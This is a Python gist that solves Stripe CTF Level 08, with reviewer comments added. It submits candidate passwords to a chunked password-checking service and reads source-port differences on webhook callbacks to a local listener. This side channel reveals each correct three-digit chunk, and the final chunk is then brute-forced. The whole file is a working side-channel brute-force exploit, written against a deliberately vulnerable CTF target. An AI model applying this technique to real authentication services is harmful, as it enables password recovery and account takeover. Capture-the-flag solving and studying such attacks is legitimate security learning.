
@philfreo
Created October 11, 2012 16:49
Stripe CTF Level 08
import thread
import sys
import socket
import time
# Address the callback listener binds to in run().  An empty host string
# means no specific interface is selected, so the port is reachable on every
# local address, not only loopback.
HOST = ''
PORT = 50004
# NOTE(review): this listing lost its indentation.  The branch bodies below
# are reconstructed; placing sys.path.append in the production branch is an
# assumption -- confirm against the original file.
if 1:
    # local
    # ABSOLUTE_HOST is the default webhook value send_request() submits.
    ABSOLUTE_HOST = '127.0.0.1:%s' % PORT
    API_URL = 'http://127.0.0.1:3000'
else:
    # production
    ABSOLUTE_HOST = 'level02-2.stripe-ctf.com:%s' % PORT
    API_URL = 'https://level08-4.stripe-ctf.com/user-ybcrziitrf/'
    # Makes a copy of requests unpacked under this directory importable.
    sys.path.append('/home/user-oopeqmzzbx/requests-0.13.8')
# tweak this
# MIN_DELTA is the smallest source-port jump find_a_chunk() treats as a hit;
# run() raises it by one for each later chunk.
MIN_DELTA = 3
# Total length every candidate password is padded to in send_request().
FLAG_LENGTH = 12
# use requests & sessions so there is keep-alive
import requests
# One session object shared by every worker thread that runs send_request().
# NOTE(review): concurrent use of a single requests session from many
# threads is not obviously safe -- confirm for the requests version in use.
session = requests.session()
def receive(s):
    """Accept one connection on *s* and return the peer's source port.

    Blocks in ``accept()`` until a connection arrives.  Nothing is read from
    the connection: the port is taken from the peer address and the
    connection is closed straight away.
    """
    client, peer_addr = s.accept()
    # The second element of the address returned by accept() is read as the
    # port; it is extracted before close(), as in the original ordering.
    source_port = peer_addr[1]
    client.close()
    return source_port
def send_request(i, prefix='', webhook=ABSOLUTE_HOST):
    """POST one candidate password to API_URL and announce a match.

    The candidate is ``prefix``, then ``i`` zero-padded to three digits, then
    '0' characters up to FLAG_LENGTH in total.  A non-empty ``webhook`` is
    sent as the only entry of the ``webhooks`` list; an empty one produces an
    empty list.  Every candidate is printed before it is sent.

    If the response text contains 'true', the password is printed between two
    banner lines and ``sys.exit(0)`` is called.
    """
    candidate = str(i).zfill(3)
    fill = '0' * (FLAG_LENGTH - len(prefix) - len(candidate))
    password = ''.join((prefix, candidate, fill))
    # The body is assembled by string formatting, not a JSON encoder; that is
    # only safe because every inserted value here is digits or a fixed host.
    if not webhook:
        data = '{"password": "%s", "webhooks": []}' % (password)
    else:
        data = '{"password": "%s", "webhooks": [ "%s" ]}' % (password, webhook)
    print(password)
    # The module-level session is only read here, so no ``global`` statement
    # is needed.  (An earlier urllib2-based request was left disabled in the
    # original; the shared session is used for keep-alive.)
    reply = session.post(API_URL, data=data).text
    if 'true' not in reply:
        return
    banner = '*************************************************'
    print(banner)
    print(password)
    print(banner)
    # NOTE(review): find_a_chunk() and run() start this function with
    # thread.start_new_thread, so the SystemExit raised here ends only the
    # calling thread; the process and the other workers keep running.
    sys.exit(0)
def find_a_chunk(s, min_delta, prefix=''):
    """Reduce the candidates 000-999 for the next chunk to a single value.

    Each candidate is submitted by send_request() in a background thread,
    after which receive() reports the source port of the next connection
    arriving on the listening socket *s*.  The candidate is put back at the
    end of the queue only when that port is at least ``min_delta`` above the
    port of the previous connection; otherwise it is discarded.  The loop
    ends when one candidate remains, which is returned zero-padded to three
    characters.

    NOTE(review): the port difference is only meaningful if the sending host
    assigns source ports sequentially and opens no unrelated connections in
    between -- neither is visible in this file.  Randomised ephemeral ports
    on that host would presumably remove the signal.  Nothing here pairs an
    accepted connection with the request that triggered it, and there is no
    timeout on the blocking accept().
    """
    candidates = list(range(1000))
    previous_port = 0
    while len(candidates) > 1:
        guess = candidates.pop(0)
        thread.start_new_thread(send_request, (guess, prefix))
        port = receive(s)
        # The first callback has no predecessor, so its delta is taken as 0.
        delta = port - previous_port if previous_port else 0
        previous_port = port
        if delta < min_delta:
            continue
        # The count is printed before the candidate is re-queued, so it does
        # not include the candidate itself.
        print('%s is one of %s possibilities' % (guess, len(candidates)))
        candidates.append(guess)
    chunk = str(candidates[0]).zfill(3)
    print('Chunk: %s' % chunk)
    return chunk
def run():
    """Open the callback listener, recover three chunks, then try the rest.

    A TCP socket is bound to (HOST, PORT) with SO_REUSEADDR set and a listen
    backlog of 1.  find_a_chunk() is called three times, each time with the
    chunks found so far as prefix and with the threshold raised by one.  The
    remaining three digits are then tried 000-999 with an empty webhook, one
    background request every 0.1 s.  The nine-character prefix is printed and
    the function sleeps forever so the worker threads can finish.

    NOTE(review): the nesting of the final loop is reconstructed from a
    listing that lost its indentation -- confirm against the original.  The
    listening socket is never closed, and with HOST set to '' it accepts
    connections on every local address.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((HOST, PORT))
    listener.listen(1)

    # Each pass appends one three-character chunk; the threshold grows with
    # the pass number (MIN_DELTA, MIN_DELTA + 1, MIN_DELTA + 2).
    prefix = ''
    for step in range(3):
        prefix += find_a_chunk(listener, MIN_DELTA + step, prefix)

    for i in range(1000):
        # Empty webhook: no callback is requested for these attempts.
        thread.start_new_thread(send_request, (i, prefix, ''))
        time.sleep(0.1)
    print(prefix)
    # Keep the main thread alive; a match is reported from a worker thread.
    while True:
        time.sleep(1)
# Entry point: the search starts as soon as this file is executed or
# imported (there is no __main__ guard).
run()